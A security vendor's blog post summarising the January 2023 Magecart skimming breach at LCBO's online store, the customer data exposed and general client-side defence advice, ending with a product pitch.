The LCBO, a major Canadian retailer, recently experienced a cybersecurity breach that compromised the personal information of thousands of customers. The incident, which was discovered on January 10th, affected the client-side of the company’s website through which LCBO conducts online sales. It resulted in the unauthorized access of sensitive information such as names, addresses, email addresses, LCBO.com account passwords, Aeroplan numbers, and credit card information.
LCBO has stated “At this time, we can confirm that an unauthorized party embedded malicious code into our website that was designed to obtain customer information during the checkout process.”
The retailer said: “Unfortunately, customers who provided personal information on our check-out pages and proceeded to our payment page on LCBO.com between January 5, 2023, and January 10, 2023, are impacted.”
The compromised personal information, the company says, includes names, addresses and email addresses.
Experts identified the web skimmer as a Magecart web skimmer. The malicious code injected was inside a Google Tag Manager (GTM) snippet encoded as Base64 to avoid detection. The use of legitimate tools like Google service is an ongoing practice by hackers to avoid detection. Once the Malicious script was loaded it allowed hackers to gain access to customer data from within the client-side environment. This highlights the importance of employing security controls within the client-side to mitigate these types of risks.
The incident at LCBO serves as a reminder that no company is immune to cybersecurity threats. This includes regularly updating software, implementing proper security controls on both the server-side and client-side of their applications, and properly training employees on how to respond to security threats to ensure that customer data is protected against the e-skimming security threats. In the wake of the breach, the LCBO has taken steps to address the issue and prevent similar incidents from happening in the future. This includes conducting a thorough investigation, updating software and security controls, and informing affected customers of the incident.
By staying vigilant and taking the necessary steps to protect their systems and customer information, online retailers can minimize the risk of a similar incident happening to them.
Protecting Against Magecart Attacks
If you’re an existing Feroot Security customer you already have detection and prevention against client-side attacks such as magecart, e-skimming, formjacking and others. Please ensure that alerts and controls are enabled.
Not a Feroot customer? Schedule a chat with one of our client-side security experts to see how you can gain better visibility into your client-side attack surface.